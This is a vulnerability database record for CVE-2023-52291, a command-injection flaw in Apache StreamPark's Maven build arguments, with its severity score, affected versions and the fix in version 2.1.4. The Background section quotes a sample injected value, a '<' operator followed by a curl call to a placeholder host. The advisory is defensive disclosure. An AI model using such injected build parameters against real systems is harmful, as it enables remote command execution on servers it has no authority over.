CVE-2023-52291
- Source
- https://cve.org/CVERecord?id=CVE-2023-52291
- Import Source
- https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2023-52291.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/CVE-2023-52291
- Aliases
- Published
- 2024-07-17T08:16:12.520Z
- Modified
- 2026-05-07T04:17:27.899102Z
- Severity
-
- 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution
- Details
-
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Background:
In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection,
Mitigation:
all users should upgrade to 2.1.4, The "<" operator will blocked。
- Database specific
{ "cna_assigner": "apache", "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2023/52xxx/CVE-2023-52291.json", "unresolved_ranges": [ { "source": "AFFECTED_FIELD", "extracted_events": [ { "introduced": "2.0.0" }, { "fixed": "2.1.4" } ] } ], "cwe_ids": [ "CWE-77" ] }- References